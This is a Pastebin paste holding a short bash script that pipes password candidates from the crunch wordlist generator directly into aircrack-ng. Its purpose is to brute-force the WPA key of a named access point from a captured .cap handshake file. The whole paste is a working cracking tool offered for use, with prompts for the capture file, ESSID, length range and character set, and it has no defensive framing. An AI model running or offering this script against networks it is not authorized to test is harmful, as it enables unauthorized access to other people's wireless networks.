Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # crunch-to-aircrack passthrough
- #!/bin/bash
- # tells crunch to generate passwords within a user-defined range,
- # then pipes the output to aircrack-ng
- # this saves a TON of disk-space and time and energy
- ############################################################################
- # path and filename of 'crunch' -- wordlist generator
- # can be found here: http://sourceforge.net/projects/crunch-wordlist/
- CRUNCH="/pentest/passwords/crunch/./crunch"
- echo "!! Crunch-to-Aircrack passthrough script"
- echo ""
- echo "?? This script reads a cap file and certain ranges for passwords,"
- echo " then runs 'crunch' to generate passwords in these ranges,"
- echo " while piping the output to aircrack-ng"
- echo ""
- echo ":: Found passwords are saved to [CapFilename].txt."
- echo " (eg. a cap file named 'wpa-01.cap' would be saved as 'wpa-01.txt')"
- echo ""
- echo "-> Enter the filename of the .CAP file (without the .cap):"
- echo " (eg. '/root/wpa-01.cap' would be '/root/wpa-01')"
- read CAP
- echo ""
- echo "-> Enter the ESSID (name) of the access point:"
- echo " (eg. NETGEAR)"
- read ESSID
- echo ""
- echo "-> Enter minimum length (eg. 8):"
- read MIN
- echo ""
- echo "-> Enter maximum length (eg. 63):"
- read MAX
- echo ""
- echo "-> Enter letters to use (eg. 0123456789):"
- read CHARSET
- ${CRUNCH} ${MIN} ${MAX} ${CHARSET} | aircrack-ng -w - -e ${ESSID} ${CAP}.cap
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement